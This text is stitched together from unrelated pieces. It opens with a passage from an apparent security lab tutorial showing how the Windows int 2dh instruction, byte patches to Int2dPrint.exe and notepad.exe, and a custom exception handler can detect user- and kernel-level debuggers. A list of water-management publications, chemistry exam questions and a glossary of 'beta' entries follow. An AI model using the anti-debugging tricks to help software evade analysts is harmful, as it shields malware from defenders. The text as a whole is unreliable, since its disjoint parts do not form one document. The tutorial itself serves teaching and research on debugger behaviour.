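# patch_bytes("Int2dPrint.exe", 0x10F9, bytes([0x31, 0xC0, 0xCD, 0x2D, 0x40]))
```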
In Figure 3, you can find the disassembly of Int2dPrint_EAX_0_JZ0.exe. Setting a breakpoint at 0x004010BA, you can execute the program step by step in IMM. You might find that the output is "AAAA" (i.e., "BBBB" is skipped). This seems to confirm the byte scission of int 2d. You can also run the program in a command window; the output is the same.
|Figure 3. Disassembly of Int2dPrint_EAX_0_JZ0.exe|
But wait, how about another experiment? Let's modify the instruction at 0x401101 to make it "JNZ 0x401138" (name this version Int2dPrint_EAX_0_JNZ0.exe). What is the expected output? "AAAABBBB"? You might find that in IMM the program outputs "AAAABBBB", but if run in a command window, it generates "AAAA" only! (Notice that we have ruled out the possibility that the I/O output was lost in a buffer, because we call fflush(stdout) to force all output immediately.) What does this mean? There could be two possibilities:
(1). Somehow, the instruction "INC EAX" is mysteriously executed (in the regular execution of Int2dPrint_EAX_0_JNZ0.exe). This makes no sense, because prior to 0x401101, the program is exactly the same as Int2dPrint_EAX_0_JZ0.exe.
(2). There is something tricky in the exception handler code (it could be the SEH of the program itself, or the KiDispatch in the kernel).
We will later come back to this strange behavior, and provide an explanation.
3.2 Experiments with Kernel-Debugging Mode
Now let's reboot the guest OS into the DEBUG mode (but without launching WinDbg in the host machine). Let's re-run the two programs; you might have some interesting findings. Both programs hang the guest OS!
Now let's reboot the guest OS again into the DEBUG mode and launch WinDbg in the host machine (press "g" twice to let it continue). Now start Int2dPrint_EAX_0_JNZ0.exe in a command window. What is your observation? Figure 4 displays the result: the debugger stops at 0x4010FD (the "inc EAX" instruction) on exception 80000003 (the "BREAKPOINT" exception code in Windows)! If you type "g", the program proceeds and produces "AAAA" (while in the non-debugged Windows mode and a command window, it produces "AAAABBBB"!).
|Figure 4: Running Result of Int2dPrint_EAX_0_JNZ0.exe|
Now let us summarize our observations so far in Table 1 (I did not discuss some of the experiments here but you can repeat them using the files provided).
|Table 1: Summary of Experiment 1|
To put it simply: int 2dh is a much more powerful technique for detecting the existence of debuggers than people previously thought (see the reference list of Tutorial 3). It can be used to detect the existence of both ring 3 (user level) and ring 0 (kernel level) debuggers. For example, using Table 1, we can easily tell whether Windows is running in DEBUG mode (i.e., kernel debugger enabled) or not, and whether a kernel debugger like WinDbg is hooked to the debug COM port. We can also tell the existence of a user level debugger such as IMM, whether Windows is running in non-debug or debug mode. The delicacy is that the final output of the int 2dh instruction is affected by many factors, and Experiment 1 only covers a subset of them. The following is a recap of some of the important facts:
- EAX, ECX, and EDX are the parameters to the int 2d service. EAX values 1, 2, 3, and 4 represent printing, interactive prompt, load image, and unload image, respectively. See Almeida's tutorial for more details. Notice that we are supplying an EAX value of 0, which is not expected by the service! (Normal values should be from 1 to 4.)
- Once the int 2d instruction is executed, the CPU locates the interrupt vector and jumps to the handler routine, which is part of the OS.
- The OS wraps the details of the hardware exception and generates kernel data structures such as EXCEPTION_RECORD, which contains the exception code 80000003 (representing a breakpoint exception).
- Then control is forwarded to the kernel routine KiDispatchException which, depending on whether Windows is running in kernel debugging mode, exhibits very sophisticated behavior. See details in G. Nebbett, "Windows NT/2000 Native API Reference" (p. 441 gives pseudo code for KiDispatchException). For example, in Windows debug mode this generally involves forwarding the exception to the debugger first (calling DbgkForwardException), then invoking the SEH handlers installed by the user program, and then forwarding the exception to the debugger a second time.
We now proceed to briefly explain all the behaviors that we have observed.
Case 1. Non-Debug Mode and Command Window (column 2 in Table 1):
this is the only case in which Int2dPrint_EAX_0_JZ0.exe and Int2dPrint_EAX_0_JNZ0.exe behave the same way. There is only one explanation: "inc EAX" is not executed, not because the exception handling behaves differently in a debugged environment, but because the entire process is terminated.
To illustrate the point, observe the two screenshots in Figure 5, which are generated by the IMM debugger via View->SEH Chain. Diagram (a) shows the SEH chain when the program has just started; you can see the default handler kernel32.7C839AC0 (meaning the entry address of the handler is 7C839AC0 and it is located in kernel32). If you set a breakpoint right before the printf(), you might notice that the SEH chain now includes another handler from Cygwin (Fig. 5(b))! It is the Cygwin handler that directly terminates the process (without throwing any error messages); if it were the kernel32 handler, it would pop up a standard Windows error dialog.
Case 2. Non-Debug Mode and IMM Debugger
|Figure 5: SEH Chain of Int2dPrint_EAX_0_JZ0.exe before and after reaching the main()|
(column 3 in Table 1): Based on the logic of the two programs, you can soon reach the conclusion that the byte instruction right after int 2dh is skipped! There are two observations here: (1) the Cygwin handler is NEVER executed! This is because the Immunity Debugger takes control first (recall the logic of KiDispatchException and the forwarding of exceptions to the debugger port). (2) The Immunity Debugger modifies the value of the EIP register, because the exception is a breakpoint. See the discussion of IMM's behavior in Ferrie's article [1]. The result of shifting one byte, however, is also affected by the kernel behavior (look at the EIP-- operation in KiDispatchException; see p. 439 of Nebbett's book). The combined effect is to shift one byte. Note that if you replace IMM with another user level debugger such as IDA, you might get a different result.
Case 3. Debug Mode without WinDbg Attached and CMD Shell (column 4 in Table 1): Windows freezes! The reason is clear: no debugger is listening on the debug port and the breakpoint exception is not handled (no one advances the EIP register).
Case 4. Debug Mode without WinDbg Attached and Run in IMM (column 5 in Table 1): This is similar to Case 2. If you press F9 (to run the program) in IMM, you might notice that IMM first stops at the SECOND instruction after int 2dh (i.e., "CMP EAX,0"), because it is a breakpoint exception but the kernel debugging service is not actually triggered. If you press F9 (continue), the program continues and exhibits the same behavior as Case 2. Again, the byte scission is the combined result of IMM and the kernel behavior (on int exceptions).
Case 5. Debug Mode with WinDbg Attached and Run in CMD Shell (column 6 in Table 1): In this case, WinDbg stops at the instruction right after int 2dh (i.e., "inc EAX") and, if continued, executes the "inc EAX" instruction.
Case 6. Debug Mode with WinDbg Attached and Run in IMM (column 7 in Table 1): In this case, WinDbg never gets the breakpoint exception; the user level debugger IMM gets it first and, as in Case 4, IMM readjusts the EIP register so that it stops at the SECOND INSTRUCTION after int 2d. It is interesting to note that even when WinDbg is attached, a user level debugger, if started, overrides WinDbg in the processing of breakpoints. This is understandable: think of using Visual Studio to debug a program while the OS is in debug mode; it is natural to pass the breakpoint event to Visual Studio first. Once the user level debugger declares that the exception has been handled, there is no need to pass it to the kernel debugger.
Clearly, the IMM debugger has a "defect" in its implementation. First, it blindly processes a breakpoint exception even if it is not a registered exception in its breakpoint list. Second, the kernel service handles the readjustment of EIP differently for int 3 and int 2d (even though both are wrapped as the 80000003 exception in Windows). Since IMM does not differentiate the two cases, the combined effect is that the readjustment of EIP is "over-cooked" and we see the byte scission.
3.3 Challenges of the Day
All of the above discussion is based on the assumption that EAX is 0 when calling the int 2d service. Notice that this is a value unexpected by the Windows kernel -- the legal values are 1, 2, 3, and 4 (debug print, interactive, load image, unload image). Your challenge today is to find out what happens when EAX is set to 1, 2, 3, 4, and other unexpected values, and to assess the system behavior. You will make interesting discoveries.
4. Experiment 2: notepad
There is another interesting area we have not explored: the user-installed SEH. The Int2d programs are good examples. The preamble code before the main function installs an SEH handler provided by Cygwin, which immediately leads to the termination of the process. It is also interesting to observe the behavior of the default kernel32 handler. The following experiment sheds some light.
4.1 Experiment Design
When we use the File->Open menu of Notepad, we always see a dialog pop up. Our plan is to insert the code from Section 3.1 before the call that pops up the dialog, and observe whether there is any byte scission.
The first question is how to locate the code in notepad.exe that launches a file-open dialog. We will again use some Immunity Debugger tricks. It is widely known that user32.dll provides important system functions related to the graphical user interface. We can examine the functions exported by user32.dll using the following approach.
- Open notepad.exe (in c:\windows) using the Immunity Debugger
- View -> Executable Modules
- Right click on "user32.dll" and select "View->Names". This exposes the entry addresses of all externally visible functions of the DLL. Browsing the list, we find a collection of functions such as CreateDialogIndirectParamA and CreateDialogIndirectParamW. Press "F2" to set a software breakpoint on each of them.
- Now press F9 to run the Notepad program. Click File->Open and IMM stops at 7E4EF01F. Go back to the View->Names window; you will find that this is the entry address of CreateDialogIndirectParamW.
- Now remove all other breakpoints (except CreateDialogIndirectParam), so that we are not distracted by others. You can do this in View->Breakpoints window to remove the ones you don't want.
- Restart the program (make sure that your BP is set) and click File->Open; you now stop at CreateDialogIndirectParamW. We will take advantage of one nice feature in IMM: click Debug->Execute Till User Code (to get to the notepad.exe code directly!). Note that since the dialog is a modal dialog (which stays there until you respond), you have to go back to the running Notepad and cancel the dialog. Then IMM stops at instruction 0x01002D89 of notepad.exe! This is right after the call to GetOpenFileNameW, which we have just returned from.
|Figure 6. Disassembly of notepad.exe|
The disassembly of notepad.exe is quite straightforward. At 0x01002D27, it sets up the dialog file filter "*.txt", and then at 0x01002D3D it calls the GetOpenFileNameW function. The return value is stored in EAX. At 0x01002D89, it tests the value of EAX. If it is 0 (meaning the file dialog was canceled), control jumps to 0x01002DE0 (which directly exits the File->Open processing).
We can now insert our instructions (mostly from Section 3.1) at 0x01002D27 (the side effect is that the dialog file filter is broken, but this is OK). The code is shown below; we call it notepad_EAX_0_JZ0.exe. Similarly, we can generate notepad_EAX_0_JNZ0.exe.
xor EAX, EAX # set EAX=0;
int 2d # invoke the exception handler
inc EAX # if executed, will set EAX=1
cmp EAX, 0
JZ 0x01002D89 # if EAX=0, jump to the EAX test at 0x01002D89
Run notepad_EAX_0_JZ0.exe in a command window (undebugged Windows); you will get the standard exception dialog thrown by Windows. If you click the "details" link of the error dialog, you will see the detailed information: note the error code 0x80000003 and the address of the exception (0x01002D2B!). I believe you can now easily draw a conclusion about the exception handler of kernel32.dll.
4.2 Challenge of the Day
|Figure 7: Error Report|
Our question is: are you sure that the error dialog is thrown by the handler kernel32.7C839AC0? Prove your argument.
5. Experiment 3: SEH Handler Technique
Recall that the SEH handler installed by the user program itself can also affect the running behavior of int 2d. For example, Int2dPrint_EAX_0_JZ0.exe installed a handler from cygwin1.dll, which leads to the immediate termination of the process, while the default kernel32.dll handler throws an exception dialog that displays debugging information. In this experiment, we repeat Ferrie's example in [3] and explore further possibilities for anti-debugging.
Figures 8 and 9 present our slightly adapted version of Ferrie's example in [3]. The program is modified from Int2dPrint.exe. The first part of the code is displayed in Figure 8, starting at 0x004010F9 and ending at 0x0040110E. We now briefly explain the logic.
Basically, the code installs a new exception handler registration record (recall that the SEH is a linked list, and each registration record has two elements: a prev pointer and the entry address of a handler). The instruction at 0x004010FB sets the handler address attribute to 0x004016E8 (we will explain this address later), and the one at 0x00401100 sets the prev pointer attribute. Then the instruction at 0x00401103 resets FS:[0], which always points to the first element in the SEH chain. The rest of the code does the old trick: it puts an "INC EAX" instruction right after the int 2d instruction and, depending on whether the instruction is skipped, it is able to tell the existence of a debugger.
|Figure 8. Part I of Ferrie's Code|
We now examine the exception handler code at 0x004016E8, shown in Figure 9, starting at 0x004016E8 and ending at 0x004016F4. It has three instructions. At 0x004016E8, it puts the dword 0x43434343 into address 0x00402025. If you study the instruction at 0x0040111C (in Figure 8), you might notice that address 0x00402025 stores the string "BBBB". So this instruction essentially stores "CCCC" into RAM. If the SEH handler is executed and the second printf() statement is executed, you should see "AAAACCCC" in the output instead of "AAAABBBB". You might wonder: why not just change the value of a register (e.g., EBX) in the handler to indicate that the SEH was executed? Recall that the OS interrupt handler will restore register values from the kernel stack; no matter what value you set in a register (except for EAX), it will be wiped out by the OS after the return.
The last two instructions of the SEH handler simply return 0. As shown by Pietrek in [1], "0" means ExceptionContinueExecution, i.e., the exception has been handled and the interrupted process should resume. There are other values you can play with, e.g., "1" means ExceptionContinueSearch, i.e., this handler could not solve the problem and the search has to continue along the SEH chain to find the next handler. Note that these values are defined in EXCEPT.h.
|Figure 9. Part II of Ferrie's Code|
There is another factor that may affect your experimental results. The Immunity Debugger can be configured as to whether or not exceptions are passed to the user program. Click the "Debugger Options" menu in IMM, and then the "Exceptions" tab (shown in Figure 10). You can specify that all exceptions be passed to user programs (by clicking the "add range" button and selecting all exceptions). After the configuration is done, running the program using "Shift+F9" will pass exceptions to the user-installed SEH (compared with F9).
|Figure 10. Configuration of Exception Handling of IMM|
Similar to Section 4, we can run our program (Int2dprint_EAX0_RET0_JZ0.exe, meaning EAX is set to 0 when calling int 2d, and the SEH handler returns 0) under different environments, with the debugging mode turned on or off. The results are displayed in Figure 11.
Non-debug mode: when running in a command window, the output is "AAAACCCC". Clearly, the user-installed SEH is executed and the byte scission did not occur (i.e., the "inc EAX" instruction is indeed executed). Compare this with the similar running environment in Table 1, and you can immediately understand the effect of returning 0 in the SEH: it tells the OS, "Everything is fine. Don't kill the process!"
If you run the program in IMM using F9 (without passing exceptions to the user program), the result is "AAAA": the "inc EAX" is skipped by IMM (similar to Table 1) and the user-installed SEH is never executed. However, if you choose Shift+F9 to pass exceptions to the user program, the SEH is executed and the "inc EAX" is executed! It seems that in the Shift+F9 mode, IMM does not re-adjust the EIP (as stated in Ferrie's article).
Debug mode with WinDbg attached: now when WinDbg is attached, the command-line run of the program yields "AAAABBBB". This means that "inc EAX" is executed but the SEH is not! I believe you can similarly explain the IMM running result.
Now, the conclusion is: the use of user installed SEH enables more possibilities to detect the existence of debuggers and how they are configured!
5.1 Challenges of the Day
|Figure 11. Experimental Results of Ferrie's Example|
Play with the return values of your SEH handler; set it to 1, 2, and other values such as negative integers. What is your observation?
The int 2d anti-debugging technique is essentially an application of OS fingerprinting, i.e., telling a system's version and configuration from its behavior. From the point of view of a program analysis researcher, it could be a very exciting problem to automatically generate such anti-debugging techniques, given the source/binary code of an operating system.
M. Pietrek, "A Crash Course on the Depths of Win32 Structured Exception Handling," Microsoft Systems Journal, January 1997. Available at http://www.microsoft.com/msj/0197/exception/exception.aspx
G. Nebbett, "Windows NT/2000 Native API Reference", pp. 439-441, ISBN: 1578701996.
P. Ferrie, "Anti-Unpacker Tricks - Part Three", Virus Bulletin, February 2009. Available at http://pferrie.tripod.com/papers/unpackers23.pdf, retrieved 09/07/2011.
UN-Water Analytical Brief – Unconventional Water Resources
Around 60% of the global population lives in areas of water stress where available supplies cannot sustainably meet demand for at least part of the year. As water scarcity is expected to continue and intensify in dry and overpopulated areas, the world at large is in danger of leaving the water scarcity challenge to future generations who will be confronted with the consequences of today’s practices.
With women better results in water management
This publication by Women for Partnership and GIZ is based on a study that consists of desk research and a presentation and analysis of thirteen case studies covering private water operators, governmental water agencies, community groups, national and international NGOs, and research institutes in several parts of the globe, including India, Tanzania, Great Britain, Bolivia, Bulgaria, Armenia, India, the Nile Basin, Malawi, Jordan, Madagascar, and Africa. The practices described in the case studies vary from access to water, sanitation, and hygiene, to water awareness, water quality, the fight against pollution, irrigation, research in the field of climate and water, to transboundary water management and the complete water sector within a country.
In many countries, women are responsible for water and have therefore gained significant knowledge in the field of water management. This knowledge is insufficiently utilised in the professional water sector. It is, as such, a hidden source of ‘capacity’: a source of knowledge often not available in other sectors.
Unconventional water sources
Unconventional water resources are essential in building a water future in dry areas where water is recognized as a precious resource and a cornerstone of the circular economy.
Read more on Unconventional water sources:
Climate Change and Community Resilience Insights from South Asia
Editors: A. K. Enamul Haque · Pranab Mukhopadhyay · Mani Nepal · Md Rumi Shammin
A timely publication that highlights local initiatives on climate change adaptation and resilience building in South Asia, which is one of the most vulnerable regions of the world to climate change impacts. Using a narrative style, this book draws on stories and examples from seven South Asian countries—Bangladesh, Bhutan, India, Maldives, Nepal, Pakistan, and Sri Lanka—to highlight how communities in South Asia are building resilience to climate change. A total of 58 authors have contributed to this volume.
The role of sound groundwater resources management and governance to achieve water security
The true value of groundwater is hidden beneath the ground. Often, the general public and policy-makers are not fully aware of the importance of this precious resource, even though groundwater provides nearly 50% of all drinking water. While the pressure on groundwater has been steadily increasing, this invisible resource continues to receive less attention than it deserves. This Global Water Security Issues (GWSI) Series 3, The role of sound groundwater resources management and governance to achieve water security, explores various case studies of tools and analyses of management, groundwater quality issues, transboundary aquifer management, and stakeholder engagement. The GWSI shines a spotlight on groundwater resources to highlight the importance of integrated water resource management and strengthened capacity for robust management decisions.
Read more: https://unesdoc.unesco.org/ark:/48223/pf0000379093.locale=en
Urban water security: A comparative assessment and policy analysis of five cities in diverse developing countries of Asia
Cities are rapidly expanding and invariably moving toward densification. Global challenges such as climate change, land-use change, environmental degradation, and expanding economy in urban areas increase water-related problems. This study addresses the difficulty of operationalizing the concept of urban water security by applying an integrative indicator-based urban water security assessment framework, formed by integrating two well-established frameworks, to evaluate the water security state in five different cities in Asia: Bangkok, Jaipur, Hanoi, Islamabad, and Madaba.
Read more: https://www.sciencedirect.com/science/article/abs/pii/S221146452200015X?via%3Dihub
Basin connected cities, connecting urban stakeholders with their watersheds
Around 55% of the world’s population live in urban areas or cities, and this is expected to rise to 68% by 2050. As cities grow there is increasing pressure on natural resources within and beyond their hydrological basins. While water connects across sectors, places and people, as well as geographic and temporal scales, hydrological and administrative boundaries do not always coincide. Building a “City-Basin Dialogue” can be a mechanism to move towards sustainable water management. Different stakeholders from catchment to consumer can be engaged in identifying and implementing appropriate and sustainable solutions for effective city-basin multi-level governance.
Read more: https://iwa-network.org/wp-content/uploads/2022/03/Brochure_Handbook_Basin_Connected_Cities_final.pdf
UN World Water Development Report
The United Nations World Water Development Report (WWDR) is UN-Water’s flagship report on water and sanitation issues, focusing on a different theme each year. The report is published by UNESCO, on behalf of UN-Water, and its production is coordinated by the UNESCO World Water Assessment Programme. The report gives insight on main trends concerning the state, use and management of freshwater and sanitation, based on work done by the Members and Partners of UN-Water.
Read more: https://www.unwater.org/publication_categories/world-water-development-report/#:~:text=The%20United%20Nations%20World%20Water,UNESCO%20World%20Water%20Assessment%20Programme
Green Roads for Water: Guidelines for Road Infrastructure in Support of Water Management and Climate Resilience
This book provides strategies to use roads for beneficial water management, tailored to diverse landscapes and climates, including watershed areas, semiarid climates, coastal lowlands, mountainous areas, and floodplains. The underlying premise of Green Roads is quite simple: designing roads to fit their natural and anthropogenic contexts; minimize externalities; and balance preservation of the road, water resources, landscape, and soil resources will usually cost less than traditional protective resilience approaches and will produce more sustainable overall outcomes.
Women Water Champions: A compendium of 41 women stewards from the grassroots
A report published in June 2021 by UNDP India. The UNDP-SIWI Water Governance Facility (WGF), under the Goal Waters Programme and with support from Sweden, provided funding and technical expertise to UNDP India for this WWC initiative.
This compendium is only a first step in documenting and recognising women’s participation in the water sector, among many others who are breaking gender barriers in water management.
These women are from different regions, from the remotest of villages and tribal belts in the country, and from different socio-economic and educational backgrounds. The compendium covers 14 states in India: Andhra Pradesh, Assam, Bihar, Haryana, Gujarat, Jharkhand, Maharashtra, Madhya Pradesh, Odisha, Rajasthan, Tamil Nadu, Uttarakhand, Uttar Pradesh, and West Bengal.
The works range from mobilizing communities on water conservation, flood management, promoting and practicing water-use efficiency, creating rainwater harvesting infrastructure, irrigation water management and improving agricultural productivity, restoration of groundwater, awareness building on clean drinking water, and leading water user groups, to working towards sustainable development. These pathbreaking works highlight that these women have not only secured their livelihoods and protected their communities through environmentally sound and sustainable practices, but have often also helped to further empower other women, upscale the activities, and bolster economic opportunities for many.
Water, Flood Management and Water Security Under a Changing Climate: Proceedings from the 7th International Conference on Water and Flood Management
This book presents selected papers from the 7th International Conference on Water and Flood Management, with a special focus on Water Security under Climate Change, held in Dhaka, Bangladesh in March 2019. The biennial conference is organized by Institute of Water and Flood Management of Bangladesh University of Engineering and Technology.
Recent decades have seen more frequent natural calamities, and climate change is believed to be an important driving factor for such hazards. Each part of the hydrological cycle is affected by global climate change. Moreover, increasing population and economic activities are posing a bigger threat to water sources. To ensure sustainable livelihoods, safeguard ecosystem services, and enhance socio-economic development, water security needs to be investigated widely in a global and regional context.
Read more https://link.springer.com/book/10.1007/978-3-030-47786-8#editorsandaffiliations
Community Participation in Decision-Making Evidence from an experiment in providing safe drinking water in Bangladesh
Delegating decision-making authority to communities in projects to provide safe drinking water has the potential to improve project outcomes and reported impact. In villages where projects were implemented under a participatory decision-making structure (the NGO Facilitated Community Participation model), a slightly larger number of safe drinking water sources was installed (0.2 more sources) and an 8% higher increase in access to safe drinking water was obtained than under a non-participatory decision-making structure (the Top-Down model). These results are broadly consistent with evidence accumulated in the past through practitioners’ experience and cross-sectional analysis, but this is the first time that experimental evidence has been available to test the hypothesis that participation in decision-making has a positive impact on the results of social programs.
Read more: \Bangladesh\info
Rainwater Harvesting System: Using water for the Future
Findings from quasi-experimental study: WASH in Schools – MHM and Learning Impact
The impact evaluation data show that the chances of managing menstrual hygiene properly are 1.3-fold higher among schoolgirls who received the inclusive WASH intervention than among schoolgirls who did not.
Read more https://www.wateraid.org/bd/sites/g/files/jkxoof236/files/2020-07/WASH%20in%20School-MHM%20and%20Learning%20Impact%20-WAB.pdf
Prospects, practices and principles of urban rainwater harvesting in Bangladesh: A Guidebook for Professionals, Practitioners and Students
In the context of an urban environment, adopting rainwater harvesting technology can reduce the pressure on the municipal water supply.
Read more https://www.wateraid.org/bd/sites/g/files/jkxoof236/files/2020-06/3P%20of%20URWH%20in%20Bangladesh.pdf
Research study on Nutrition Security and Equity in its Access in Watershed Development Programmes
The priority in the implementation of any watershed programme is to improve drinking water status, land productivity, and the livelihoods of its stakeholders.
International Rainwater Catchment Systems Experiences: Towards Water Security
Due to population growth, pollution, and climate change, water scarcity will be one of the most critical problems all around the world in the next 15 years. Today, around 10% of the world’s population lacks a proper water supply service. Harvesting rainwater and using it for drinking, domestic, industrial, and agricultural uses will help to supply quality water to urban and rural populations. This book has sections on rainwater harvesting in Bangladesh and Sri Lanka, and from all around the world.
Climate Change: Science and Politics – A CSE India publication
“We need more reality checks in the climate change narrative. The impacts are certain, but as yet, action is pusillanimous. We deserve better. In these COVID-19 times, we have seen disorder and disruption at a scale that we never imagined. So, now we need the same scale to fix what is broken in our relationship with nature. The future, like never before, is in our hands. Nature has spoken. Now we should speak gently back to her. Tread lightly on the Earth”.
This publication uses latest statistics, scientific information and data from sources across the world to cover every key aspect of climate change:
– Net Zero
– Carbon Budgets etc. | <urn:uuid:613a4d34-c97d-4fb3-8c39-0502cc91b2b8> | CC-MAIN-2023-14 | https://sarainwater.org/publications/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945287.43/warc/CC-MAIN-20230324144746-20230324174746-00404.warc.gz | en | 0.910863 | 2,587 | 2.75 | 3 |
Some s Block Elements
Previous Years Questions
MCQ (Single Correct Answer)
A sample of MgCO3 is dissolved in dil. HCl and the solution is neutralized with ammonia and buffered with NH4Cl / NH4OH. Disodium hydrogen phosphate r...
To a solution of colourless sodium salt, a solution of lead nitrate was added to have a white precipitate which dissolves in warm water and reprecipit...
Indicate the products (X) and (Y) in the following reactions: Na2S + nS (n = 1–8) → (X); Na2SO3 + S → (Y)...
The white precipitate (Y), obtained on passing colourless and odourless gas (X) through an ammoniacal solution of NaCl, loses about 37% of its weight ...
In the extraction of Ca by electro-reduction of molten CaCl2, some CaF2 is added to the electrolyte for the following reason:
The compound, which evolves carbon dioxide on treatment with aqueous solution of sodium bicarbonate at 25$$^\circ$$C, is
The reactive species in chlorine bleach is
Which of the following is least thermally stable?
Which of the following solutions will turn violet when a drop of lime juice is added to it?
MCQ (More than One Correct Answer)
The correct statement(s) about B2H6 is/are:
During electrolysis of molten NaCl, some water was added. What will happen? | <urn:uuid:3833114e-8228-47b0-adb8-ff244f5a9a53> | CC-MAIN-2023-14 | https://questions.examside.com/past-years/jee/wb-jee/chemistry/some-s-block-elements | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943555.25/warc/CC-MAIN-20230320175948-20230320205948-00604.warc.gz | en | 0.923215 | 333 | 3.109375 | 3 |
45 relations: Acrophony, Ancient Greek, Argos, ß, B, Be (Cyrillic), Bet (letter), Beta, Beta (climbing), Beta (finance), Beta angle, Beta particle, Betacam, Betamax, Byzantium, Corinth, Cursive, Cyclades, Descender, Gortyn, Greek alphabet, Greek numerals, High-definition video, Hurricane Beta, International Phonetic Alphabet, JVC, Megara, Milos, Modern Greek, NTSC, Ordinal number, Phoenician alphabet, Regression analysis, Romanization of Greek, Santorini, Semitic languages, Sony, Standardized coefficient, Type I and type II errors, Ve (Cyrillic), VHS, Voiced bilabial fricative, Voiced bilabial stop, Voiced labiodental fricative, 2005 Atlantic hurricane season.
Acrophony (Greek: ἄκρος akros uppermost + φωνή phone sound) is the naming of letters of an alphabetic writing system so that a letter's name begins with the letter itself.
The Ancient Greek language includes the forms of Greek used in ancient Greece and the ancient world from around the 9th century BC to the 6th century AD.
Argos (Modern Greek: Άργος; Ancient Greek: Ἄργος) is a city in Argolis, the Peloponnese, Greece and is one of the oldest continuously inhabited cities in the world.
In German orthography, the grapheme ß, called Eszett or scharfes S, in English "sharp S", represents the phoneme in Standard German, specifically when following long vowels and diphthongs, while ss is used after short vowels.
B or b (pronounced) is the second letter of the ISO basic Latin alphabet.
Be (Б б; italics: Б б) is a letter of the Cyrillic script.
Bet, Beth, Beh, or Vet is the second letter of the Semitic abjads, including Phoenician Bēt, Hebrew Bēt, Aramaic Bēth, Syriac Bēṯ ܒ, and Arabic ب. Its sound value is a voiced bilabial stop ⟨b⟩ or a voiced labiodental fricative ⟨v⟩.
Beta (uppercase Β, lowercase β, or cursive ϐ; bē̂ta or βήτα) is the second letter of the Greek alphabet.
Beta is climbing jargon that designates information about a climb.
In finance, the beta (β or beta coefficient) of an investment indicates whether the investment is more or less volatile than the market as a whole.
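The beta coefficient defined above is the ratio of the covariance between asset and market returns to the variance of the market returns. A minimal sketch on synthetic data (the return series and the 1.5 amplification factor are fabricated purely for illustration, not real market data):

```python
import numpy as np

# Hypothetical daily return series for illustration only.
rng = np.random.default_rng(0)
market = rng.normal(0.0005, 0.01, 250)              # market returns
asset = 1.5 * market + rng.normal(0.0, 0.005, 250)  # asset that amplifies market moves

# beta = Cov(asset, market) / Var(market); beta > 1 means more volatile than the market.
beta = np.cov(asset, market)[0, 1] / np.var(market, ddof=1)
print(f"beta ≈ {beta:.2f}")  # close to the 1.5 built into the synthetic data
```

Note the matching `ddof=1` in `np.var`: `np.cov` uses the unbiased (n−1) normalization by default, so the variance must too.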
The beta angle (β) is a measurement that is used most notably in spaceflight.
A beta particle, also called beta ray or beta radiation, (symbol β) is a high-energy, high-speed electron or positron emitted by the radioactive decay of an atomic nucleus during the process of beta decay.
Betacam is a family of half-inch professional videocassette products developed by Sony in 1982.
Betamax (also called Beta, as in its logo) is a consumer-level analog-recording and cassette format of magnetic tape for video.
Byzantium or Byzantion (Ancient Greek: Βυζάντιον, Byzántion) was an ancient Greek colony in early antiquity that later became Constantinople, and later Istanbul.
Corinth (Κόρινθος, Kórinthos) is an ancient city and former municipality in Corinthia, Peloponnese, which is located in south-central Greece.
Cursive (also known as script or longhand, among other names) is any style of penmanship in which some characters are written joined together in a flowing manner, generally for the purpose of making writing faster.
The Cyclades (Κυκλάδες) are an island group in the Aegean Sea, southeast of mainland Greece and a former administrative prefecture of Greece.
In typography, a descender is the portion of a letter that extends below the baseline of a font.
Gortyn, Gortys or Gortyna (Γόρτυν, Γόρτυς, or Γόρτυνα) is a municipality and an archaeological site on the Mediterranean island of Crete, 45 km away from the modern capital Heraklion.
The Greek alphabet has been used to write the Greek language since the late 9th or early 8th century BC.
Greek numerals, also known as Ionic, Ionian, Milesian, or Alexandrian numerals, are a system of writing numbers using the letters of the Greek alphabet.
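In this system each letter carries a fixed value (beta counts as 2; the first nine letters count units, the next nine tens, the last nine hundreds), and a number is read as the sum of its letters. A small illustrative converter covering only a subset of the alphabet (the letter values are the standard Ionic ones; the function itself is our sketch):

```python
# Ionic (Milesian) numeral values for a subset of Greek letters.
GREEK_VALUES = {
    "α": 1, "β": 2, "γ": 3, "δ": 4, "ε": 5,   # units
    "ι": 10, "κ": 20, "λ": 30,                 # tens
    "ρ": 100, "σ": 200,                        # hundreds
}

def greek_to_int(numeral: str) -> int:
    """Sum the letter values, e.g. ρκβ = 100 + 20 + 2 = 122."""
    return sum(GREEK_VALUES[ch] for ch in numeral)

print(greek_to_int("ρκβ"))  # 122
print(greek_to_int("ιβ"))   # 12
```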
High-definition video is video of higher resolution and quality than standard-definition.
Hurricane Beta was a compact, but intense tropical cyclone that impacted the southwestern Caribbean in late October 2005.
International Phonetic Alphabet
The International Phonetic Alphabet (IPA) is an alphabetic system of phonetic notation based primarily on the Latin alphabet.
JVC, the Japan Victor Company, is a Japanese international professional and consumer electronics corporation based in Yokohama.
Megara (Μέγαρα) is a historic town and a municipality in West Attica, Greece.
Milos or Melos (Modern Greek: Μήλος; Μῆλος Melos) is a volcanic Greek island in the Aegean Sea, just north of the Sea of Crete.
Modern Greek (Νέα Ελληνικά or Νεοελληνική Γλώσσα "Neo-Hellenic", historically and colloquially also known as Ρωμαίικα "Romaic" or "Roman", and Γραικικά "Greek") refers to the dialects and varieties of the Greek language spoken in the modern era.
NTSC is named after the National Television System Committee (1951–1953).
In set theory, an ordinal number, or ordinal, is one generalization of the concept of a natural number that is used to describe a way to arrange a collection of objects in order, one after another.
The Phoenician alphabet, called by convention the Proto-Canaanite alphabet for inscriptions older than around 1050 BC, is the oldest verified alphabet.
In statistical modeling, regression analysis is a set of statistical processes for estimating the relationships among variables.
Romanization of Greek
Romanization of Greek is the transliteration (letter-mapping) or transcription (sound-mapping) of text from the Greek alphabet into the Latin alphabet.
Santorini (Σαντορίνη), classically Thera (English pronunciation), and officially Thira (Greek: Θήρα), is an island in the southern Aegean Sea, about 200 km (120 mi) southeast of Greece's mainland.
The Semitic languages are a branch of the Afroasiatic language family originating in the Middle East.
Sony is a Japanese multinational conglomerate corporation headquartered in Kōnan, Minato, Tokyo.
In statistics, standardized coefficients or beta coefficients are the estimates resulting from a regression analysis that have been standardized so that the variances of dependent and independent variables are 1.
Type I and type II errors
In statistical hypothesis testing, a type I error is the rejection of a true null hypothesis (also known as a "false positive" finding), while a type II error is failing to reject a false null hypothesis (also known as a "false negative" finding).
